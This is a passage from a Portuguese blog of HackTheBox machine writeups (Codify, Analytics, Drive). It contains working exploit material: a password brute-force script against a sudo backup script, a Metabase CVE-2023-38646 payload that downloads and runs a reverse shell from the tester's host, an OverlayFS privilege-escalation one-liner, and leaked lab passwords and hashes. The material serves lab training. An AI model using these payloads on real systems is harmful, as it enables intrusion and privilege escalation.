/usr/bin/echo 'Done!'

Aqui vemos que precisamos informar uma senha que bata com o conteúdo de /root/.creds, para que o script seja executado.

Podemos constatar que a ideia é descobrir a senha e que ela seja a mesma do usuário root, pois a execução do script em si somente filtra removendo os bancos information_schema e performance_schema, de forma que os demais tenham um backup efetuado através do comando mysqldump.

Analisando o código bash encontramos uma vulnerabilidade na condicional que realiza a comparação entre a senha fornecida pelo input do usuário e a senha que consta no arquivo do usuário root.

Ocorre que quando o operador do lado direito dentro do duplo colchete não esta entre aspas o bash realiza uma combinação por padrões, conhecido como pattern matching. Ou seja, você não precisa passar o valor exato, somente um valor que seja verdadeiro.

Por exemplo, se a senha for hackthebox, se você informar o valor hack* o mesmo será aceito.

Com isso podemos tentar buscar a senha através de brute force!

Podemos realizar um teste rápido para validar nossa teoria. Criamos um arquivo contendo todos os caracteres ASCII através do seguinte comando:

for ((i=32;i<127;i++)) do printf "\\$(printf %03o "$i")"; done;printf "\n" > ascii.txt

Com o arquivo em mãos podemos realizar um simples brute force:

joshua@codify:~$ for i in $(cat ascii.txt); do echo "$i*" | sudo /opt/scripts/mysql-backup.sh - && echo $i; done

Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!
Password confirmation failed!

Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions
Done!
?
Password confirmation failed!

Agora temos um padrão, quando a senha o valor ascii é inválido retorna “Password confirmation failed!” e quando é válido retorna “Password confirmed!”.

Com isso podemos criar um script que quando recebe o retorno de senha válida adicionar numa lista, assim printando a lista!

Podemos criar utilizando python para facilitar, uma vez que ele ja possui uma forma mais simples de gerar os caracteres em ascii.

Resultando no seguinte script:

import string
import subprocess

all_ascii = list(string.ascii_letters + string.digits)

password = ""
found = False

while not found:
    for character in all_ascii:
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout

        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        found = True

E ao executar temos o seguinte retorno:

joshua@codify:~$ python3 brute.py 
k
kl
klj
kljh
kljh1
kljh12
kljh12k
kljh12k3
kljh12k3j
kljh12k3jh
kljh12k3jha
kljh12k3jhas
kljh12k3jhask
kljh12k3jhaskj
kljh12k3jhaskjh
kljh12k3jhaskjh1
kljh12k3jhaskjh12
kljh12k3jhaskjh12k
kljh12k3jhaskjh12kj
kljh12k3jhaskjh12kjh
kljh12k3jhaskjh12kjh3

Com o resultado em mãos podemos escalar privilégios para root e buscar a root flag!

joshua@codify:~$ su root
Password: 
root@codify:/home/joshua# ls -a /root/
.  ..  .bash_history  .bashrc  .creds  .local  .mysql_history  .profile  root.txt  scripts  .ssh  .vimrc
root@codify:/home/joshua# cat /root/root.txt 
1e36b6429f527ac7327a8eb4a4fa57a5

Finalizando assim a máquina Codify!!

HackTheBox - Writeup Analytics

Guilherme Martins — Sat, 30 Mar 2024 14:41:12 +0000

Neste writeup iremos explorar uma máquina linux de nível easy chamada Analytics.

Esta máquina aborda as seguintes vulnerabilidades:

CVE-2023-38646 - Pre-Auth RCE in Metabase
CVE-2023-2640 e CVE-2023-32629 - GameOver(lay)

Recon, primeira vulnerabilidade e user Flag

Vamos iniciar realizando uma varredura nas portas utilizando o nmap:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/analytics]
└─# nmap -sV --open -Pn 10.129.86.111              
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-07 19:37 EDT
Nmap scan report for analytics.htb (10.129.86.111)
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Como podemos visualizar no retorno do nmap o host alvo tem as portas 22 e 80 abertas. A porta 22 é do ssh, e a 80 esta rodando um nginx, um servidor web ou proxy reverso.

Ao acessar pelo navegador o IP na porta 80 somos redirecionados para analytics.htb, vamos adicionar em nosso /etc/hosts esse endereço.

E ao acessar novamente temos a seguinte página:

Dentre as funcionalidades do site temos a opção de login, que ao clicar somos redirecionados para data.analytics.htb, vamos também adicionar ao /etc/hosts.

Agora conseguimos acessar o subdomínio, que se trata de um metabase:

O metabase é uma ferramenta open-source para business intelligence que permite a criação de charts e dashboards proveniente de diversas fontes, como bancos de dados por exemplo.

Buscando por vulnerabilidades no metabase foi encontrado um Pre-Auth Remote Code Execution, a CVE-2023-38646.

Esta CVE permite um RCE, conforme mencionado anteriormente, ela ocorre pois a instalação padrão do metabase expõe o setup-token. Esta exposição ocorre pois algumas partes do workflow de setup foram removidos, incluindo a parte que remove o setup-token após a instalação.

O metabase permite a conectividade com diversos datasources, e durante a instalação é exposto o endpoint /api/setup/validate, que recebe uma JDBC URI como parte de uma requisição POST, que é validado a conexão antes de finalizar a instalação.

Existem diversas possibilidades de exploração de JDBC connectors, no caso de bancos de dados H2 abusando do parâmetro INIT é a forma mais frequente. Inclusive existe um report para o metabase desta vulnerabilidade:

Remote Code Execution via H2

No entanto não se aplica a versão 0.46.0 que é utilizada no alvo, pois o metabase esta bloqueando a função INIT.

Mas a CVE que estamos analisando e iremos utilizar informa sobre um SQL Injection no driver do H2, que permite a execução de comandos sem utilizar a função INIT.

A função INIT permite execuções de queries SQL quando se inicia a conexão com um banco de dados. Com essa função bloqueada precisamos utilizar o argumento TRACE_LEVEL_SYSTEM_OUT para criar uma stack de SQL queries em nosso SQL Injection e assim executar comandos.

Com isso precisamos avaliar para qual banco apontar durante a exploração, uma vez que apontar para o banco do metabase iria corromper o mesmo.

Neste caso podemos utilizar o banco de dados sample que é existe dentro do arquivo JAR do metabase. Através do ZIP URI podemos setar este banco para explorar a vulnerabilidade sem corromper nada.

Vamos buscar primeiramente o setup-token:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/analytics]
└─# curl -s http://data.analytical.htb/api/session/properties | jq . | grep setup-token
"setup-token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",

Agora com o setup token em mãos vamos criar um arquivo chamado rev.sh que contém nosso reverse shell:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/analytics]
└─# cat rev.sh  
sh -i >& /dev/tcp/10.10.14.186/9002 0>&1

Agora precisamos utilizar o RCE para realizar o download do nosso reverse shell no servidor remoto. Para isso vamos subir um servidor web utilizando python:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/analytics]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...

E agora vamos utilizar o burp suite para realizar a seguinte requisição com nossa ZIP URI montada e apontando para o banco de dados sample do metabase:

POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type: application/json
Content-Length: 731

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl -O http://10.10.14.186:8081/rev.sh')\n$$--=x",
            "advanced-options": false,
            "ssl": false
        },
        "name": "test123",
        "engine": "h2"
    }
}

Com isso temos o retorno em nosso servidor web:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/analytics]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.129.86.111 - - [08/Oct/2023 11:26:38] "GET /rev.sh HTTP/1.1" 200 -

Uma vez que nosso reverse shell esta no servidor remoto vamos abrir uma conexão com o netcat ouvindo na porta 9001:

┌──(root㉿kali)-[/home/…/hackthebox/machines-windows/visual/repo]
└─# nc -lvnp 9001
listening on [any] 9001 ...

Agora vamos alterar o comando remoto para executar nosso reverse shell:

...
...Runtime.getRuntime().exec('bash rev.sh')..
...

Ficando da seguinte forma:

E assim temos o retorno em nosso netcat, com o nosso primeiro shell:

┌──(root㉿kali)-[/home/…/hackthebox/machines-windows/visual/repo]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.186] from (UNKNOWN) [10.129.86.111] 50406
sh: can't access tty; job control turned off
/ $ id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)

Umá rápida análise notamos que estamos em um container, no entanto, ao visualizar as envs encontramos dados de acesso nas envs META_USER e META_PASS:

/ $ env
MB_LDAP_BIND_DN=
LANGUAGE=en_US:en
USER=metabase
HOSTNAME=d18aa1afd928
FC_LANG=en-US
SHLVL=3
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
HOME=/home/metabase
OLDPWD=/tmp
MB_EMAIL_SMTP_PASSWORD=
LC_CTYPE=en_US.UTF-8
JAVA_VERSION=jdk-11.0.19+7
LOGNAME=metabase
_=plugins
MB_DB_CONNECTION_URI=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_PASS=
MB_JETTY_HOST=0.0.0.0
META_PASS=An4lytics_ds20223#
LANG=en_US.UTF-8
MB_LDAP_PASSWORD=
SHELL=/bin/sh
MB_EMAIL_SMTP_USERNAME=
MB_DB_USER=
META_USER=metalytics
LC_ALL=en_US.UTF-8
JAVA_HOME=/opt/java/openjdk
PWD=/
MB_DB_FILE=//metabase.db/metabase.db

E assim conseguimos acesso via ssh utilizando usuário e senha encontrados:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/analytics]
└─# ssh metalytics@analytical.htb
metalytics@analytical.htb's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64)

- Documentation: [https://help.ubuntu.com](https://help.ubuntu.com/)
- Management: [https://landscape.canonical.com](https://landscape.canonical.com/)
- Support: https://ubuntu.com/advantage

System information as of Sun Oct  8 03:47:20 PM UTC 2023

System load:              0.3564453125
Usage of /:               93.8% of 7.78GB
Memory usage:             29%
Swap usage:               0%
Processes:                201
Users logged in:          0
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0:    10.129.86.111
IPv6 address for eth0:    dead:beef::250:56ff:fe96:8e71

=> / is using 93.8% of 7.78GB
=> There are 45 zombie processes.

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Last login: Tue Oct  3 09:14:35 2023 from 10.10.14.41
metalytics@analytics:~$

Com isso conseguimos a user flag:

metalytics@analytics:~$ ls -alh
total 36K
drwxr-x--- 4 metalytics metalytics 4.0K Aug  8 11:37 .
drwxr-xr-x 3 root       root       4.0K Aug  8 11:37 ..
lrwxrwxrwx 1 root       root          9 Aug  3 16:23 .bash_history -> /dev/null
-rw-r--r-- 1 metalytics metalytics  220 Aug  3 08:53 .bash_logout
-rw-r--r-- 1 metalytics metalytics 3.7K Aug  3 08:53 .bashrc
drwx------ 2 metalytics metalytics 4.0K Aug  8 11:37 .cache
drwxrwxr-x 3 metalytics metalytics 4.0K Aug  8 11:37 .local
-rw-r--r-- 1 metalytics metalytics  807 Aug  3 08:53 .profile
-rw-r----- 1 root       metalytics   33 Oct  7 23:35 user.txt
-rw-r--r-- 1 metalytics metalytics   39 Aug  8 11:30 .vimrc
metalytics@analytics:~$ cat user.txt
6f09e034504ed254520c3060b18bbe89

Escalação de privilégios e root flag

Realizando um recon não foi encontrada nenhum arquivo com dados expostos, comandos que possam ser executados como root ou com suid ativo. No entanto, podemos notar que estamos em uma máquina Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64).

Com essas infos podemos buscar por vulnerabilidades recentes, o que é bem comum serem utilizadas em novas máquinas do HackTheBox.

Em uma busca foram encontradas duas vulnerabilidades: CVE-2023-2640 e CVE-2023-32629, aka GameOver(lay).

Essas vulnerabilidades ocorrem no OverlayFS. OverlayFS é uma implementação de sistema de arquivos utilizado pelo linux. Ele combina vários pontos de montagem subjacentes diferentes em um, resultando em uma estrutura de diretório única que contém arquivos e subdiretórios subjacentes de todas as fontes.

Ocorre que nas duas vulnerabilidades arquivos são movidos de um diretório inferior para um superior com seus atributos estendidos sem alterações, ou seja, é possível herdar capabilities e assim escalar privilégios.

Capabilties como CAP_SYS_ADMIN ou CAP_SETUID, que garantem execuções privilegiadas são enviadas para o diretório, ou layer, superior. O que pode permitir usuários não privilegiados escalar privilégios.

As duas vulnerabilidades ocorrem em uma função do kernel chamada ovl_do_setxattr, que chama um wrapper vulnerável chamado __vfs_setxattr_noperm, que por sua vez não restringe as capabilities para a namespace.

Analisando as diversas postagens sobre as duas vulnerabilidades foi possível encontrar algumas Poc's inline, o que deixa a vulnerabilidade mais crítica.

Para nosso caso utilizei o seguinte comando, que eleva as permissões do python, desta forma o mesmo é executado com permissões de root:

metalytics@analytics:/tmp$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("ls -alh /root/")'
mkdir: cannot create directory ‘l’: File exists
mkdir: cannot create directory ‘u’: File exists
mkdir: cannot create directory ‘w’: File exists
mkdir: cannot create directory ‘m’: File exists
total 48K
drwx------  6 root root 4.0K Oct  7 23:35 .
drwxr-xr-x 18 root root 4.0K Aug  8 11:37 ..
lrwxrwxrwx  1 root root    9 Apr 27 16:10 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Oct 15  2021 .bashrc
drwx------  2 root root 4.0K Apr 27 16:09 .cache
drwxr-xr-x  3 root root 4.0K Apr 27 16:35 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r-----  1 root root   33 Oct  7 23:35 root.txt
drwxr-xr-x  2 root root 4.0K Aug 25 15:14 .scripts
-rw-r--r--  1 root root   66 Aug 25 15:14 .selected_editor
drwx------  2 root root 4.0K Apr 27 16:07 .ssh
-rw-r--r--  1 root root   39 Aug  8 11:30 .vimrc
-rw-r--r--  1 root root  165 Aug  8 11:53 .wget-hsts

E assim conseguimos buscar a root flag:

metalytics@analytics:/tmp$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cat /root/root.txt")'
mkdir: cannot create directory ‘l’: File exists
mkdir: cannot create directory ‘u’: File exists
mkdir: cannot create directory ‘w’: File exists
mkdir: cannot create directory ‘m’: File exists
9081b3c76b813330cd43690360cd8ab8

No entanto, é possível pegar shell como root facilmente alterando o comando final:

$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);pty.spawn("/bin/bash")'

E assim finalizamos a máquina Analytics :)

HackTheBox - Writeup Drive [Retired]

Guilherme Martins — Wed, 21 Feb 2024 23:42:57 +0000

HackTheBox

Neste writeup iremos explorar uma máquina linux de nível hard chamada Drive que aborda as seguintes vulnerabilidades e técnicas de exploração:

IDOR
Password Hardcoded
Hash Cracking
SQL Injection load lib

Recon e user flag

Vamos iniciar realizando uma varredura no host alvo para visualizar as portas abertas, para isso vamos utilizar o nmap:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/drive]
└─# nmap -sV --open -Pn 10.129.81.217 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 15:04 EDT
Nmap scan report for 10.129.81.217
Host is up (0.26s latency).
Not shown: 996 closed tcp ports (reset), 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Temos aqui um nginx rodando na porta 80 e a porta 22 do ssh.
Ao acessar pelo navegador somos redirecionados para drive.htb, vamos adicionar em nosso /etc/hosts.

Uma vez adicionado temos a seguinte página web:

Aqui temos um Doogle Grive, que é uma aplicação "clone" do Google Drive.
Acessando http://drive.htb/register temos uma tela para criação de usuário e em http://drive.htb/login temos uma tela de login.

Podemos criar um usuário e acessar a aplicação para uma melhor análise:

E com estes dados acessar a aplicação, que nos retorna a seguinte página:

Temos aqui duas novas opções, uma permitindo upload de arquivos:

E outra para o Dashboard:

Podemos notar que ja existe um arquivo no dashboard que pertence ao usuário admin, mas esta no grupo public, sendo assim conseguimos visualizar seu conteúdo:

Utilizando o Burp Suite como proxy conseguimos analisar todas as requisições e respostas que são realizadas durante a navegação pelo site. Através desta análise conseguimos notar que existe um ID para cada arquivo, que é utilizado em diversas requisições como ler o conteúdo do arquivo:

Se realizarmos o upload de algum arquivo ele recebe um ID também, como podemos notar na url do arquivo de teste abaixo:

Podemos utilizar o intruder do Burp Suite para buscar por outras ID's e tentar descobrir novos arquivos. Para isso precisamos testar em diversos endpoints a procura de algum IDOR.

No payload colocamos uma lista que vai de 1 a 999. Com isso basta clicar em Start attack.

E analisando os requests realizados temos o seguinte retorno no ID 79 no endpoint /block:

Também podemos acessar http://drive.htb/79/block pelo navegador para ter uma melhor visualização:

Ao clicar em Just View temos a seguinte mensagem:

hey team after the great success of the platform we need now to continue the work.
on the new features for ours platform.
I have created a user for martin on the server to make the workflow easier for you please use the password "Xk4@KjyrYv8t194L!".
please make the necessary changes to the code before the end of the month
I will reach you soon with the token to apply your changes on the repo
thanks!

Aqui temos nossa primeira vulnerabilidade, um Insecure Direct Object References (IDOR), ocorre quando conseguimos ter acesso a recursos que o usuário não deveria ter.

A mensagem informa que foi criado um usuário para martin e uma senha, podemos testar o acesso ssh:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/drive]
└─# ssh martin@drive.htb 
martin@drive.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Sat 14 Oct 2023 09:08:56 PM UTC
  System load:           0.12
  Usage of /:            63.1% of 5.07GB
  Memory usage:          20%
  Swap usage:            0%
  Processes:             229
  Users logged in:       0
  IPv4 address for eth0: 10.129.81.217
  IPv6 address for eth0: dead:beef::250:56ff:fe96:c5d5
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Foram encontradas diversas outras mensagens, como por exemplo:

ID 101:

hi team!
me and my friend(Cris) created a new scheduled backup plan for the database
the database will be automatically highly compressed and copied to /var/www/backups/ by a small bash script every day at 12:00 AM
*Note: the backup directory may change in the future!
*Note2: the backup would be protected with strong password! don't even think to crack it guys! :)

ID 98:

hi team
have a great day.
we are testing the new edit functionality!
it seems to work great!

ID 99:

hi team
please we have to stop using the document platform for the chat
+I have fixed the security issues in the middleware
thanks! :)

Conseguimos acesso com o usuário martin, agora podemos realizar um recon do servidor alvo.

Encontramos arquivos de backup do banco, conforme descrito na mensagem contido no ID 101:

martin@drive:~$ ls -alh /var/www/backups/
total 3.7M
drwxr-xr-x 2 www-data www-data 4.0K Sep  1 18:23 .
drwxr-xr-x 5 root     root     4.0K Sep 15 13:34 ..
-rw-r--r-- 1 www-data www-data  13K Sep  1 20:00 1_Dec_db_backup.sqlite3.7z
-rw-r--r-- 1 www-data www-data  12K Sep  1 20:00 1_Nov_db_backup.sqlite3.7z
-rw-r--r-- 1 www-data www-data  13K Sep  1 20:00 1_Oct_db_backup.sqlite3.7z
-rw-r--r-- 1 www-data www-data  13K Sep  1 20:00 1_Sep_db_backup.sqlite3.7z
-rwxr-xr-x 1 root     root     3.6M Dec 26  2022 db.sqlite3

Realizando o download para nossa máquina conseguimos visualizar o conteúdo do arquivo db.sqlite3 utilizando o SQLite Browser. Nesse banco existem diversos usuários e senhas:

Os demais arquivo estão compactados e protegidos por senha, não sendo possível descompactar com as senhas que ja obtivemos.

No entanto, nesse arquivo temos algumas hashes de usuários:

jamesMason:sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz:sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands:sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004
crisDisel:sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin:sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3

Mas não conseguimos quebrar a senha.

Temos algumas portas rodando no localhost, como a 33060, 3306 e 3000:

martin@drive:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::3000                 :::*                    LISTEN      -

Geralmente a porta 3306 é utilizada pelo banco de dados MySQL. Mas podemos visualizar os serviços criando um tunel via ssh, de forma que seja disponível em nossa máquina nas portas 3306, 3000 e 33060:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/drive]
└─# ssh -L 3306:127.0.0.1:3306 -L 3000:127.0.0.1:3000 martin@drive.htb 
martin@drive.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)

Podemos visualizar as novas portas abertas em nossa máquina local:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/drive]
└─# netstat -ntlp | egrep '3306|3000|33060'
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      3389263/ssh         
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      3389263/ssh         
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      3389263/ssh         
tcp6       0      0 ::1:33060               :::*                    LISTEN      3389263/ssh         
tcp6       0      0 ::1:3000                :::*                    LISTEN      3389263/ssh         
tcp6       0      0 ::1:3306                :::*                    LISTEN      3389263/ssh

Agora conseguimos acessar através da nossa máquina e confirmar que na porta 3306 temos realmente um mysql:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/drive]
└─# nc -v 127.0.0.1 3306
localhost [127.0.0.1] 3306 (mysql) open

Na porta 33060 temos algum serviço que aceita conexões tcp e udp:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/drive]
└─# nc -uv 127.0.0.1 33060
localhost [127.0.0.1] 33060 (?) open
┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/drive]
└─# nc -v 127.0.0.1 33060 
localhost [127.0.0.1] 33060 (?) open

E na porta 3000 tem um gitea, que é um git open source e self hosted:

Como podemos nos registrar vamos criar um usuário para visualizar se existe algum repositório público para usuários registrados:

Aqui conseguimos combinar a senha que descobrimos inicialmente Xk4@KjyrYv8t194L! e o usuário que visualizamos no banco martinCruz e assim conseguimos acesso ao gitea!

Com isso conseguimos visualizar um repositório privado:

E no arquivo http://localhost:3000/crisDisel/DoodleGrive/src/branch/main/db_backup.sh temos o seguinte conteúdo:

#!/bin/bash
DB=$1
date_str=$(date +'%d_%b')
7z a -p'H@ckThisP@ssW0rDIfY0uC@n:)' /var/www/backups/${date_str}_db_backup.sqlite3.7z db.sqlite3
cd /var/www/backups/
ls -l --sort=t *.7z > backups_num.tmp
backups_num=$(cat backups_num.tmp | wc -l)
if [[ $backups_num -gt 10 ]]; then
      #backups is more than 10... deleting to oldest backup
      rm $(ls  *.7z --sort=t --color=never | tail -1)
      #oldest backup deleted successfully!
fi
rm backups_num.tmp

Com essa senha conseguimos descompactar os backups:

┌──(root㉿kali)-[~kali/…/machines-linux/drive/writeup-shits/backups]
└─# 7z x 1_Dec_db_backup.sqlite3.7z 
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,128 CPUs Intel(R) Core(TM) i5-1038NG7 CPU @ 2.00GHz (706E5),ASM,AES-NI)
Scanning the drive for archives:
1 file, 13018 bytes (13 KiB)
Extracting archive: 1_Dec_db_backup.sqlite3.7z
--
Path = 1_Dec_db_backup.sqlite3.7z
Type = 7z
Physical Size = 13018
Headers Size = 170
Method = LZMA2:22 7zAES
Solid = -
Blocks = 1
Enter password (will not be echoed):
Everything is Ok             
Size:       3760128
Compressed: 13018

E assim vamos extrair todos os backups e buscar todas as hashes dos usuários, assim como fizemos no primeiro arquivo.

Com isso temos as seguintes hashes:

# Dezembro:
jamesMason:pbkdf2_sha256$390000$npEvp7CFtZzEEVp9lqDJOO$So15//tmwvM9lEtQshaDv+mFMESNQKIKJ8vj/dP4WIo=
martinCruz:pbkdf2_sha256$390000$GRpDkOskh4irD53lwQmfAY$klDWUZ9G6k4KK4VJUdXqlHrSaWlRLOqxEvipIpI5NDM=
tomHands:pbkdf2_sha256$390000$wWT8yUbQnRlMVJwMAVHJjW$B98WdQOfutEZ8lHUcGeo3nR326QCQjwZ9lKhfk9gtro=
crisDisel:pbkdf2_sha256$390000$TBrOKpDIumk7FP0m0FosWa$t2wHR09YbXbB0pKzIVIn9Y3jlI3pzH0/jjXK0RDcP6U=
admin:pbkdf2_sha256$390000$ZjZj164ssfwWg7UcR8q4kZ$KKbWkEQCpLzYd82QUBq65aA9j3+IkHI6KK9Ue8nZeFU=

# Novembro:
jamesMason:sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz:sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands:sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a
crisDisel:sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin:sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3

# Setembro:
jamesMason:sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz:sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands:sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93
crisDisel:sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin:sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3

# Outubro:
jamesMason:sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz:sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands:sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141
crisDisel:sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin:sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3

Notamos aqui que somente em Dezembro temos um tipo de hash diferente dos demais meses.
Aqui vamos precisar separar as hashes por tipos e por usuário e tentar quebrá-las.
Para diminuir o tempo neste procedimento vamos nos atentar somente aos usuários cris e tom, pois são os únicos que possuem shell no host alvo:

root:x:0:0:root:/root:/bin/bash
git:x:115:119:Git Version Control,,,:/home/git:/bin/bash
